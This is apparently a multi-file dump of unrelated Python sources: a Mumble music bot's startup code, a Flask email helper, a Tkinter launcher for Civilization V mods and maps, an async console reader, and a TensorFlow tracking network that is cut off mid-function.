parsed_configs = config.read([util.solve_filepath('configuration.default.ini'), util.solve_filepath(args.config)],
encoding='utf-8')
if len(parsed_configs) == 0:
logging.error('Could not read configuration from file \"{}\"'.format(args.config))
sys.exit()
# ======================
# Setup Logger
# ======================
bot_logger = logging.getLogger("bot")
bot_logger.setLevel(logging.INFO)
if args.verbose:
bot_logger.setLevel(logging.DEBUG)
bot_logger.debug("Starting in DEBUG loglevel")
elif args.quiet:
bot_logger.setLevel(logging.ERROR)
bot_logger.error("Starting in ERROR loglevel")
logfile = util.solve_filepath(var.config.get('bot', 'logfile').strip())
handler = None
if logfile:
print(f"Redirecting stdout and stderr to log file: {logfile}")
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
sys.stdout = util.LoggerIOWrapper(bot_logger, logging.INFO, fallback_io_buffer=sys.stdout.buffer)
sys.stderr = util.LoggerIOWrapper(bot_logger, logging.INFO, fallback_io_buffer=sys.stderr.buffer)
else:
handler = logging.StreamHandler()
util.set_logging_formatter(handler, bot_logger.level)
bot_logger.addHandler(handler)
logging.getLogger("root").addHandler(handler)
var.bot_logger = bot_logger
# ======================
# Load Database
# ======================
if args.user:
username = args.user
else:
username = var.config.get("bot", "username")
sanitized_username = "".join([x if x.isalnum() else "_" for x in username])
var.settings_db_path = args.db if args.db is not None else util.solve_filepath(
config.get("bot", "database_path", fallback=f"settings-{sanitized_username}.db"))
var.music_db_path = args.music_db if args.music_db is not None else util.solve_filepath(
config.get("bot", "music_database_path", fallback="music.db"))
var.db = SettingsDatabase(var.settings_db_path)
if var.config.get("bot", "save_music_library", fallback=True):
var.music_db = MusicDatabase(var.music_db_path)
else:
var.music_db = MusicDatabase(":memory:")
DatabaseMigration(var.db, var.music_db).migrate()
var.music_folder = util.solve_filepath(var.config.get('bot', 'music_folder'))
var.tmp_folder = util.solve_filepath(var.config.get('bot', 'tmp_folder'))
# ======================
# Translation
# ======================
lang = ""
if args.lang:
lang = args.lang
else:
lang = var.config.get('bot', 'language', fallback='en_US')
if lang not in supported_languages:
raise KeyError(f"Unsupported language {lang}")
var.language = lang
constants.load_lang(lang)
# ======================
# Prepare Cache
# ======================
var.cache = MusicCache(var.music_db)
if var.config.getboolean("bot", "refresh_cache_on_startup", fallback=True):
var.cache.build_dir_cache()
# ======================
# Load playback mode
# ======================
playback_mode = None
if var.db.has_option("playlist", "playback_mode"):
playback_mode = var.db.get('playlist', 'playback_mode')
else:
playback_mode = var.config.get('bot', 'playback_mode', fallback="one-shot")
if playback_mode in ["one-shot", "repeat", "random", "autoplay"]:
var.playlist = media.playlist.get_playlist(playback_mode)
else:
raise KeyError(f"Unknown playback mode '{playback_mode}'")
# ======================
# Create bot instance
# ======================
var.bot = MumbleBot(args)
command.register_all_commands(var.bot)
# load playlist
if var.config.getboolean('bot', 'save_playlist', fallback=True):
var.bot_logger.info("bot: load playlist from previous session")
var.playlist.load()
# ============================
# Start the web interface
# ============================
if var.config.getboolean("webinterface", "enabled"):
wi_addr = var.config.get("webinterface", "listening_addr")
wi_port = var.config.getint("webinterface", "listening_port")
tt = threading.Thread(
target=start_web_interface, name="WebThread", args=(wi_addr, wi_port))
tt.daemon = True
bot_logger.info('Starting web interface on {}:{}'.format(wi_addr, wi_port))
tt.start()
# Start the main loop.
var.bot.loop()
|
email.py
|
from flask_mail import Message
from threading import Thread
from flask import render_template, current_app
from . import mail
def send_async_email(app, msg):
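    # Flask-Mail's send() needs an application context; since this runs in a worker
    # thread (outside any request), we enter one explicitly.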
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['BIAO_MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['SECURITY_EMAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
defiance_launcher.py
|
import os, subprocess, shutil, sys
import parser5
from tkinter import *
import tkinter.messagebox
from tkinter import simpledialog
import requests, zipfile, io, tldextract, json
import pygame, threading, re
class myWindow(Frame):
def __init__(self,parent=None):
Frame.__init__(self,parent)
self.parent = parent
self.pack()
self.make_widgets()
def make_widgets(self):
        # don't assume that self.parent is a root window.
        # instead, call `winfo_toplevel()` to get the root window
self.winfo_toplevel().title("Defiance Launcher "+ver)
# this adds something to the frame, otherwise the default
# size of the window will be very small
#label = Entry(self)
#label.pack(side="top", fill="x")
def valid_url(url):
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
a = re.match(regex, url)
if a:
return True
else:
return False
def doesnothing():
tkinter.messagebox.showwarning("In Development", "Oops, this does nothing at the moment :(")
def ask_url():
f1=False
f2=False
#f3=False
url = simpledialog.askstring("Input", "Note: You may only download zip files\nEnter URL: ")
#print(url)
if url != None:
a=valid_url(url)
if a != True:
tkinter.messagebox.showwarning("Invalid", "Not a valid URL. Please try again.")
else:
f2=True
if url != None and f2==True:
ext = tldextract.extract(url)
#ext.domain == "dropbox"
#url = url + "?raw=1"
b = url[-4:]
if b != '.zip' and ext.domain != "dropbox":
tkinter.messagebox.showwarning("Invalid","URL must end with \".zip\"")
#print(b)
if ext.domain == "dropbox":
if re.search(r'preview=', url, re.IGNORECASE):
raise ValueError("You are using dropbox's preivew link, use actual zipfile link!\n\nHint: Right click on zipfile, select \"Copy link address\"")
if re.search(r'\?dl=0', url, re.IGNORECASE):
r = re.compile(r'\?dl=0',re.IGNORECASE)
url = r.sub(r'', url)
b = url[-4:]
if b == '.zip':
url=url+"?dl=1"
else:
raise ValueError("Bad Download URL")
f1 = True
    if f1 and f2:
return url
def dl_resources(url, asset):
#download and unpack zip file in mod folder
try:
statusText.set("Downloading...Please wait..")
disableLaunch()
# download from url
r = requests.get(url)
# extract filename from url header
d = r.headers['content-disposition']
modName = re.findall("filename=(.+)", d)
modName = ''.join(modName)
modName = re.findall(r'"([^"]*)"', modName)
modName = ''.join(modName)
modName = modName[:-4]
print("starting unzip")
z = zipfile.ZipFile(io.BytesIO(r.content))
fname=z.namelist()[0].split("/")[0]
if asset == "map":
z.extractall("maps/")
elif asset == "mod":
z.extractall("mods/")
else:
print("dl asset err")
# update resources with new asset
with open("resources.json", "r") as jsonFile:
data = json.load(jsonFile)
a = asset + "s"
match = False
for i in data[a]:
if i["name"] == modName:
match = True
if match == False:
data[a].append({'name': modName, 'folderName': fname, 'url': url})
with open("resources.json", "w") as jsonFile:
json.dump(data, jsonFile)
except:
e = sys.exc_info()[0]
tkinter.messagebox.showwarning("Error", "Error: %s" % e)
return "error"
statusText.set("Ready.")
enableLaunch()
def dl_map():
try:
a = ask_url()
if a:
v = dl_resources(a,"map")
if v != "error":
map_dropdown = []
mp.children["menu"].delete(0, "end")
data = json.load(open("resources.json"))
for map in data["maps"]:
map_dropdown.append(map["name"])
mp.children["menu"].add_command(label=map["name"], command=lambda m=map["name"]: map_select(m))
#setMenu('map')
with open("state.json", "r") as jsonFile:
statedata = json.load(jsonFile)
if statedata["map"] == "":
variable2.set("MAPs")
else:
variable2.set(statedata["map"])
except ValueError as err:
tkinter.messagebox.showwarning("Error", err.args)
def dl_mod():
try:
a = ask_url()
if a:
v = dl_resources(a,"mod")
if v != "error":
mod_dropdown = []
md.children["menu"].delete(0, "end")
data = json.load(open("resources.json"))
for mod in data["mods"]:
mod_dropdown.append(mod["name"])
md.children["menu"].add_command(label=mod["name"], command=lambda m=mod["name"]: mod_select(m))
#setMenu('mod')
#with open("state.json", "r") as jsonFile:
# statedata = json.load(jsonFile)
#if statedata["map"] == "":
# variable1.set("MAPs")
#else:
# variable1.set(statedata["map"])
except ValueError as err:
tkinter.messagebox.showwarning("Error", err.args)
def aboutpage():
tkinter.messagebox.showinfo("About Defiance-Launcher", "Contribute at https://www.github.com/m3hran/defiance-launcher")
def setMenu(type):
statedata = json.load(open("state.json"))
if type == "mod":
if statedata["mod"] == "":
a = parser5.find_existing("mod")
if a:
variable1.set(a)
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
data[type] = a
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
else:
variable1.set("MODs")
if statedata["mod"] != "":
variable1.set(statedata["mod"])
if type == "map":
if statedata["map"] == "":
a = parser5.find_existing("map")
if a:
variable2.set(a)
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
data[type] = a
print("setting asset " + data[type])
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
else:
variable2.set("MAPs")
if statedata["map"] != "":
variable2.set(statedata["map"])
def init_resources():
#init in a different thread
def callback1():
sema.acquire()
# Ensure resources.json exists otherwise fail.
if not os.path.isfile("resources.json"):
tkinter.messagebox.showwarning("Error", "Could not find resources.json file.")
            root.destroy()
# Create folders
if not os.path.exists("mods"):
os.makedirs("mods")
if not os.path.exists("maps"):
os.makedirs("maps")
# load resources
data = json.load(open("resources.json"))
# Download MODs if necessary
for mod in data["mods"]:
if not os.path.exists("mods/"+mod["folderName"]):
lock.set("true")
statusText.set("Downloading " + mod["name"] + " ...")
dl_resources(mod["url"],"mod")
#print("downloading "+mod["name"])
lock.set("false")
# Download Maps if necessary
for map in data["maps"]:
if not os.path.exists("maps/"+ map["folderName"]):
lock.set("true")
statusText.set("Downloading " + map["name"] + "...")
dl_resources(map["url"],"map")
#print("downloading "+map["name"])
lock.set("false")
statusText.set("Locating Steamapps...Please wait..")
if (sema.acquire(blocking=False)):
statusText.set("Ready.")
sema.release()
def callback2():
sema.acquire()
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
if data["path"] == "" or data["path"] == None:
statusText.set("Locating Steamapps...Please wait..")
lock.set("true")
install_path=parser5.find_installation()
print("game path found!")
statusText.set("Steamapps Located...")
data["path"]=install_path
with open('state.json', 'w') as f:
json.dump(data, f, ensure_ascii=False)
if (sema.acquire(blocking=False)):
statusText.set("Ready.")
lock.set("false")
sema.release()
t1 = threading.Thread(target=callback1)
t1.start()
t2 = threading.Thread(target=callback2)
t2.start()
def LaunchCiv():
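    # Launch only if no download/copy operation holds the semaphore. The Steam
    # executable path is derived by trimming everything from "steamapps" onward, and
    # the game is started via the steam:// protocol (app id 8930 is Civilization V;
    # "%5Cdx11" passes the \dx11 launch option).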
if sema.acquire(blocking=False):
data = json.load(open("state.json"))
print(data["path"])
steampath=data["path"]
steampath= re.sub('(steamapps).*', '', steampath)
steampath=steampath+"Steam.exe"
subprocess.Popen([steampath,"steam://rungameid/8930//%5Cdx11"])
sema.release()
root.destroy()
def SetAsset(name,type):
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
data[type] = name
if type == 'mod':
p = "\\Assets\\DLC\\"
q = "mods\\"
if type == 'map':
p = "\\Assets\\Maps\\"
q = "maps\\"
with open("resources.json", "r") as jsonFile:
d = json.load(jsonFile)
for mod in d[type+"s"]:
if name == mod["name"]:
name = mod["folderName"]
dpath= data["path"] + p + name
if not os.path.exists(dpath):
def callback3():
if type == 'mod':
md.configure(state="disabled")
if type == 'map':
mp.config(state="disabled")
sema.acquire()
statusText.set("Modding...Please wait..")
disableLaunch()
shutil.copytree(q+name, dpath)
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
sema.release()
if (sema.acquire(blocking=False)):
enableLaunch()
if type == 'mod':
md.configure(state="active")
if type == 'map':
mp.configure(state="active")
statusText.set("Ready.")
sema.release()
t3 = threading.Thread(target=callback3)
t3.start()
def rmAsset(type):
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
if data[type] != "":
with open("resources.json", "r") as jsonFile:
d = json.load(jsonFile)
for mod in d[type + "s"]:
if data[type] == mod["name"]:
name = mod["folderName"]
modp=data["path"] + "\\Assets\\DLC\\" + name + "\\"
mapp=data["path"] + "\\Assets\\Maps\\" + name + "\\"
def callback4():
sema.acquire()
disableLaunch()
statusText.set("Removing...Please wait..")
if type == 'mod':
if os.path.exists(modp):
shutil.rmtree(modp)
if type == 'map':
if os.path.exists(mapp):
shutil.rmtree(mapp)
data[type] = ""
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
sema.release()
if (sema.acquire(blocking=False)):
enableLaunch()
statusText.set("Ready.")
sema.release()
t4 = threading.Thread(target=callback4)
t4.start()
#refact mod_select
def mod_select(name):
data = json.load(open("state.json"))
if name != None:
if data["mod"] == "":
print(name)
SetAsset(name,"mod")
variable1.set(name)
else:
if data["mod"] != name and sema.acquire(blocking=False):
rmAsset("mod")
SetAsset(name,"mod")
variable1.set(name)
sema.release()
else:
variable1.set("MODs")
def map_select(name):
data = json.load(open("state.json"))
if name != None:
if data["map"] == "":
SetAsset(name,"map")
variable2.set(name)
else:
if data["map"] != name and sema.acquire(blocking=False):
rmAsset("map")
SetAsset(name,"map")
variable2.set(name)
sema.release()
else:
variable2.set("MAPs")
def removeAll():
rmAsset("mod")
variable1.set("MODs")
rmAsset("map")
variable2.set("MAPs")
def enableLaunch():
LaunchButt.configure(state="active", image=LaunchIcon_en )
def disableLaunch():
LaunchButt.configure(state="disabled")
def muteselection():
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
if checkCmd.get() == 1:
pygame.mixer.music.pause()
print("music off.")
data["music"] = "off"
if checkCmd.get() == 0:
pygame.mixer.music.unpause()
print("music on.")
data["music"] = "on"
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
def on_enter(event):
if sema.acquire(blocking=False):
statusText.set("Launch..")
sema.release()
def on_leave(event):
if sema.acquire(blocking=False):
statusText.set("Ready.")
sema.release()
# ********* Main **********
#music
pygame.init()
pygame.mixer.music.load("baba.mp3")
pygame.mixer.music.play(-1)
ver="0.18.0503"
install_path = ""
fname=""
sema = threading.BoundedSemaphore(value=2)
sema2 = threading.BoundedSemaphore(value=1)
root = Tk()
root.iconbitmap(r'launcher_favicon.ico')
root.geometry("%dx%d+%d+%d" % (300, 300, 250, 350))
root.attributes("-alpha", 0.9)
root.configure(bg="#10397c")
root.resizable(width=False, height=False)
window = myWindow(root)
window.pack(side=LEFT)
statusText = StringVar()
statusText.set("Ready.")
lock = StringVar()
lock.set("false")
# ********** Main Menu **********
menu = Menu(root)
root.config(menu=menu)
subMenu = Menu(menu)
menu.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Add Mod pack...", command=dl_mod)
subMenu.add_command(label="Add Map pack...", command=dl_map)
subMenu.add_separator()
subMenu.add_command(label="Exit",command=root.destroy)
viewMenu = Menu(menu)
menu.add_cascade(label="View", menu=viewMenu)
viewMenu.add_command(label="View Logs", command=doesnothing)
viewMenu.add_command(label="About...", command=aboutpage)
# ****** Toolbar ********
toolbar = Frame(root, bg="#10397c")
RemoveButt = Button(toolbar, text="Remove All", command=removeAll)
RemoveButt.pack(side=LEFT, padx=2, pady=2)
#AddModButt = Button(toolbar, text=" + Mod ", command=dl_mod)
#AddModButt.pack(side=LEFT, padx=2, pady=2)
#AddMapButt = Button(toolbar, text=" + Map ", command=dl_map)
#AddMapButt.pack(side=LEFT, padx=2, pady=2)
toolbar.pack(side=TOP, fill=X)
checkCmd = IntVar()
with open("state.json", "r") as jsonFile:
statedata = json.load(jsonFile)
if statedata["music"] == "on":
checkCmd.set(0)
if statedata["music"] == "off":
checkCmd.set(1)
muteselection()
mute= Checkbutton(toolbar, text="Mute", variable=checkCmd, command=muteselection)
mute.pack(side=RIGHT)
# ***** Statusbar *******
status = Label(root, textvariable=statusText, bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
f1= Frame(root, bg="#10397c")
f1.pack(side=TOP, pady=20)
f2= Frame(root, bg="#10397c")
f2.pack(side=TOP, pady=10)
f3= Frame(root, bg="#10397c")
f3.pack(side=BOTTOM)
#load resources
variable1 = StringVar(f1)
variable2 = StringVar(f2)
mod_dropdown=[]
data = json.load(open("resources.json"))
for mod in data["mods"]:
mod_dropdown.append(mod["name"])
with open("state.json", "r") as jsonFile:
statedata = json.load(jsonFile)
setMenu("mod")
if mod_dropdown != []:
md = OptionMenu(f1, variable1, *mod_dropdown, command=mod_select)
else:
md = OptionMenu(f1, variable1, None, command=mod_select)
md.pack(side=LEFT, padx=25)
map_dropdown=[]
data = json.load(open("resources.json"))
for map in data["maps"]:
map_dropdown.append(map["name"])
setMenu("map")
if map_dropdown != []:
mp = OptionMenu(f2, variable2, *map_dropdown, command=map_select)
else:
mp = OptionMenu(f2, variable2, None, command=map_select)
mp.pack(side=LEFT, padx=25)
LaunchButt = Button(f3, text="Launch", command=LaunchCiv)
#LaunchIcon= PhotoImage(file="defiance_logo.png")
LaunchIcon_en= PhotoImage(file="launch3.png")
LaunchButt.config(image=LaunchIcon_en,height=82,width=82)
LaunchButt["bg"] = "white"
LaunchButt[ "border" ] = "3"
LaunchButt.pack(side=LEFT,pady=10)
LaunchButt.bind("<Enter>", on_enter)
LaunchButt.bind("<Leave>", on_leave)
init_resources()
root.mainloop()
|
async_file_reader.py
|
import os, sys, threading
from queue import Queue
from collections import deque
from time import sleep, time
if sys.platform.startswith('linux'):
def set_nonblocking(fd):
import fcntl
flag = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
else:
def set_nonblocking(fd):
import msvcrt
from ctypes import windll, byref, wintypes, WinError, POINTER
from ctypes.wintypes import HANDLE, DWORD, BOOL
PIPE_NOWAIT = DWORD(0x00000001)
def pipe_no_wait(pipefd):
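            # SetNamedPipeHandleState with PIPE_NOWAIT puts the pipe handle into
            # non-blocking mode on Windows, so reads return immediately when no data
            # is available instead of blocking the reader thread.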
SetNamedPipeHandleState = windll.kernel32.SetNamedPipeHandleState
SetNamedPipeHandleState.argtypes = [HANDLE, POINTER(DWORD), POINTER(DWORD), POINTER(DWORD)]
SetNamedPipeHandleState.restype = BOOL
h = msvcrt.get_osfhandle(pipefd)
res = windll.kernel32.SetNamedPipeHandleState(h, byref(PIPE_NOWAIT), None, None)
if res == 0:
print(WinError())
return False
return True
return pipe_no_wait(fd)
class AsyncFileReader:
def __init__(self, f):
self.f = f
self.queue = Queue()
self.thread = threading.Thread(target=self._read_thread)
self.keep_polling = True
self.thread.daemon = True
self.thread.start()
def _read_thread(self):
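        # On Linux the fd is switched to non-blocking, so readline() returns '' when
        # no data is pending; each line is queued with a timestamp so stdout/stderr
        # can later be merged in arrival order (see AsyncConsoleReader.read).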
blocking = True
if sys.platform.startswith('linux'):
set_nonblocking(self.f.fileno())
blocking = False
try:
f = self.f
while self.keep_polling and not f.closed:
while not f.closed:
line = f.readline()
if not line: break
self.queue.put( ( time(), line ) )
if not blocking:
sleep(0.015)
except:
return
def available(self):
return not self.queue.empty()
def readline(self):
if self.available():
return self.queue.get()[1]
return ''
def get(self):
if self.available():
return self.queue.get()
return None
def print(self):
while self.available():
print(self.readline(), flush=True, end='')
def stop(self):
self.keep_polling = False
self.thread.join()
# self.print()
class AsyncConsoleReader:
def __init__(self, stdout, stderr):
self.out = AsyncFileReader(stdout)
self.err = AsyncFileReader(stderr)
self.current_out = None
self.current_err = None
    def available(self):
        return self.current_out is not None or self.current_err is not None \
            or self.out.available() or self.err.available()
def _peek_out(self):
if self.current_out: return self.current_out
self.current_out = self.out.get()
return self.current_out
def _peek_err(self):
if self.current_err: return self.current_err
self.current_err = self.err.get()
return self.current_err
def stop(self):
self.out.stop()
self.err.stop()
def read(self):
out = self._peek_out()
err = self._peek_err()
if out and (not err or out[0] <= err[0]):
self.current_out = None
return (out[1], None)
if err and (not out or err[0] <= out[0]):
self.current_err = None
return (None, err[1])
return (None, None)
|
net.py
|
import tensorflow as tf
import numpy as np
import cv2
from threading import Thread
#import ipdb
#-------------------------------------------------------------------------------
def smooth_l1_loss(x):
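    # Smooth L1 (Huber) loss: quadratic (0.5 * x^2) for |x| < 1 and linear
    # (|x| - 0.5) otherwise, so large residuals do not dominate the gradient.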
square_loss = 0.5*x**2
absolute_loss = tf.abs(x)
return tf.where(tf.less(absolute_loss, 1.), square_loss, absolute_loss-0.5)
def _activation_summary(x):
"""Helper to create summaries for activations.
Creates a summary that provides a histogram of activations.
Creates a summary that measure the sparsity of activations.
Args:
x: Tensor
Returns:
nothing
"""
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
tensor_name = x.op.name
# tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.summary.histogram(tensor_name + '/activations', x)
tf.summary.scalar(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def _variable_summaries(var):
"""Attach a lot of summaries to a Tensor."""
if not tf.get_variable_scope().reuse:
name = var.op.name
#logging.debug("Creating Summary for: %s" % name)
with tf.name_scope('summaries'):
tf.summary.scalar(name, var)
#mean = tf.reduce_mean(var)
#tf.summary.scalar(name + '/mean', mean)
#with tf.name_scope('stddev'):
# stddev = tf.sqrt(tf.reduce_sum(tf.square(var - mean)))
#tf.summary.scalar(name + '/sttdev', stddev)
#tf.summary.scalar(name + '/max', tf.reduce_max(var))
#tf.summary.scalar(name + '/min', tf.reduce_min(var))
tf.summary.histogram(name, var)
#-------------------------------------------------------------------------------
class TRACKNET:
def __init__(self, batch_size, wd = 0.000005, bd = 0.0000005, train = True):
self.batch_size = batch_size
self.wreg = tf.contrib.layers.l2_regularizer(wd)
self.breg = tf.contrib.layers.l2_regularizer(bd)
self.train = train
self.build()
#-----------------------------------------------------------------------
# Building the net
#-----------------------------------------------------------------------
def build(self):
self.target = tf.placeholder(tf.float32, [self.batch_size, 100, 100, 3])
self.mid = tf.placeholder(tf.float32, [self.batch_size, 400, 400, 3])
self.search = tf.placeholder(tf.float32, [self.batch_size, 400, 400, 3])
self.bboxMid= tf.placeholder(tf.float32, [self.batch_size, 5])
self.bbox= tf.placeholder(tf.float32, [self.batch_size, 4])
def resUnit(inData, outChannel, kerSize, layerName):
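            # One "residual unit": a same-resolution conv (info), a stride-2 conv that
            # doubles the channels (strid), and a 1x1 reduction back to outChannel
            # (redu). The output concatenates redu with a resized skip connection --
            # the pre-stride features for the first unit, the (1x1-reduced) raw input
            # otherwise.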
info = tf.layers.conv2d(inData, outChannel, kerSize, 1, name=layerName+'_info', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
_activation_summary(info)
strid = tf.layers.conv2d(info, outChannel*2, kerSize, 2, name=layerName+'_strid', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
_activation_summary(strid)
redu = tf.layers.conv2d(strid, outChannel, 1, 1, name=layerName+'_redu', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
_activation_summary(redu)
if 'ResUnit1' in layerName:
info = tf.image.resize_images(info, redu.shape[1:3])
outData = tf.concat([redu, info], axis=-1)
else:
inData = tf.image.resize_images(inData, redu.shape[1:3])
inData = tf.layers.conv2d(inData, outChannel, 1, 1, name=layerName+'_skip_redu', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
outData = tf.concat([redu, inData], axis=-1)
return outData
########### for target ###########
with tf.variable_scope("net_target"):
x = self.target
x = resUnit(x, 16, 3, 'targetResUnit1')
x = resUnit(x, 32, 3, 'targetResUnit2')
x = resUnit(x, 64, 3, 'targetResUnit3')
self.targetF = x
self.conv_output_target_up = resUnit(x, 32, 3, 'targetResUnit3_up')
x = resUnit(x,128, 3, 'targetResUnit4')
x = resUnit(x, 64, 3, 'targetResUnit5')
self.conv_output_target = x
_activation_summary(self.conv_output_target)
########### for mid ###########
with tf.variable_scope("net_mid"):
x = self.mid
x = resUnit(x, 16, 3, 'midResUnit1')
x = resUnit(x, 32, 3, 'midResUnit2')
x = resUnit(x, 64, 3, 'midResUnit3')
self.midF = x
x = resUnit(x,128, 3, 'midResUnit4')
x = resUnit(x,256, 3, 'midResUnit5')
self.conv_output_mid_up = resUnit(x, 32, 3, 'midResUnit6_up')
x = resUnit(x,128, 3, 'midResUnit6')
x = resUnit(x, 64, 3, 'midResUnit7')
self.conv_output_mid = x
_activation_summary(self.conv_output_mid)
########### for search ###########
with tf.variable_scope("net_search"):
x = self.search
x = resUnit(x, 16, 3, 'searchResUnit1')
x = resUnit(x, 32, 3, 'searchResUnit2')
x = resUnit(x, 64, 3, 'searchResUnit3')
self.searchF = x
x = resUnit(x,128, 3, 'searchResUnit4')
x = resUnit(x,256, 3, 'searchResUnit5')
self.conv_output_search_up = resUnit(x, 32, 3, 'searchResUnit6_up')
x = resUnit(x,128, 3, 'searchResUnit6')
x = resUnit(x, 64, 3, 'searchResUnit7')
self.conv_output_search = x
_activation_summary(self.conv_output_search)
        ########### Concatenate all nets ###########
########### fully connencted layers ###########
with tf.variable_scope("fc_nets"):
            # now three feature maps, each 3 x 3 x 128 + three upper feature maps, each 6 x 6 x 64
concatLow = tf.concat([self.conv_output_target, self.conv_output_mid, self.conv_output_search], axis = 3)
concatUp = tf.concat([self.conv_output_target_up, self.conv_output_mid_up, self.conv_output_search_up], axis = 3)
flatLow = tf.layers.flatten(concatLow)
flatUp = tf.layers.flatten(concatUp)
x = tf.concat([flatLow, flatUp], axis = -1)
x = tf.layers.dense(x, 4096, name='fc1', activation=tf.nn.elu, kernel_regularizer=self.wreg , bias_regularizer=self.breg)
_activation_summary(x)
x = tf.layers.dense(x, 2048, name='fc2', activation=tf.nn.elu, kernel_regularizer=self.wreg , bias_regularizer=self.breg)
_activation_summary(x)
self.fc_output = tf.layers.dense(x, 8, name='fc_out', activation=None, kernel_regularizer=self.wreg , bias_regularizer=self.breg)
self.result = {
'bbox_mid': self.fc_output[:,:4],
'bbox_search': self.fc_output[:,4:]
}
#-----------------------------------------------------------------------
# Compute loss
#-----------------------------------------------------------------------
with tf.variable_scope("loss"):
fc_output_mid = self.fc_output[:,:4]
fc_output_search = self.fc_output[:,4:]
bboxGT = self.bbox
pmMidBB = self.bboxMid
            ## Calculate mid predicted BB distance from the search GT BB and penalize if above threshold (0.3, i.e. 30% of the image size)
midBBDistFromGT = tf.subtract(bboxGT, fc_output_mid)
midBBDistFromGT = tf.abs(midBBDistFromGT)
midBBDistFromGT = tf.where(tf.greater(midBBDistFromGT, 0.3), midBBDistFromGT, tf.zeros(midBBDistFromGT.shape, dtype=tf.float32))
midBBDistFromGT = tf.reduce_sum(midBBDistFromGT, axis=1)
self.midBBoxGTLoss = tf.reduce_mean(midBBDistFromGT, name="midBBoxGTLoss")
_variable_summaries(self.midBBoxGTLoss)
## Bound the predicted box dimensions
widthBoxMid = tf.abs(fc_output_mid[:,2] - fc_output_mid[:,0])
heightBoxMid = tf.abs(fc_output_mid[:,3] - fc_output_mid[:,1])
searchWidth = tf.abs(bboxGT[:,2] - bboxGT[:,0])
searchHeight = tf.abs(bboxGT[:,3] - bboxGT[:,1])
widthDiff = tf.abs(widthBoxMid - searchWidth)
heightDiff = tf.abs(heightBoxMid - searchHeight)
widthDiffLoss = tf.where(tf.greater(widthDiff, 0.1), widthDiff, tf.zeros(widthDiff.shape, dtype=tf.float32))
heightDiffLoss = tf.where(tf.greater(heightDiff, 0.1), heightDiff, tf.zeros(heightDiff.shape, dtype=tf.float32))
diffLoss = tf.add(widthDiffLoss, heightDiffLoss)
self.diffLoss = tf.reduce_mean(diffLoss, name="diffLoss")
_variable_summaries(self.diffLoss)
## Calculate bounding box regression loss for the mid patch
# First, filter the invalid bounding boxes
bbCordSum = tf.reduce_sum(pmMidBB[:,:4], axis=1)
validMask = tf.tile(tf.reshape(tf.logical_and(tf.greater(bbCordSum, 0.01), tf.greater(pmMidBB[:,4],0.75)), [self.batch_size,1]), [1,4])
pmMidBB = tf.reshape(tf.boolean_mask(pmMidBB[:,:4], validMask), [-1,4])
fc_output_mid = tf.reshape(tf.boolean_mask(fc_output_mid, validMask), [-1,4])
self.checks = pmMidBB
# Now, calculate the L1 loss
bboxDistMid = tf.subtract(pmMidBB, fc_output_mid)
bboxDistMid = tf.abs(bboxDistMid)
bboxDistMid = tf.reduce_sum(bboxDistMid, axis=1)
bboxLossMid = tf.reduce_mean(bboxDistMid, name="bboxLossMid")
self.bboxLossMid = tf.where(tf.is_nan(bboxLossMid), 0., bboxLossMid, name="bboxLossMid")
_variable_summaries(self.bboxLossMid)
## Calculate bounding box regression loss
bboxDist = tf.subtract(bboxGT, fc_output_search)
bboxDist = tf.abs(bboxDist)
bboxDist = tf.reduce_sum(bboxDist, axis=1)
self.bboxLoss = tf.reduce_mean(bboxDist, name="bboxLoss")
_variable_summaries(self.bboxLoss)
self.loss = self.bboxLoss + self.bboxLossMid + 2*self.midBBoxGTLoss + 2*self.diffLoss
self.losses = {
'bboxLoss': self.bboxLoss,
'bboxLossMid': self.bboxLossMid,
'midBBoxLoss': self.midBBoxGTLoss,
'diffLoss': self.diffLoss
}
#-------------------------------------------------------------------------------
#-----------------------------------------------------------------------
# Python function to compute the best mid bounding box using PM match
#-----------------------------------------------------------------------
def pmMatchMidBB(self, inData):
#def findBestMatch(i, searchBBoxGTScaled, mid, search, targetPM, meanTarget, stdTarget, nccMax, pmMidBB):
# ## Extract search object based on GT bounding box, for the PM match
# searchPM = search[i, int(search.shape[1]*searchBBoxGTScaled[i,1]):int(search.shape[1]*searchBBoxGTScaled[i,3]),
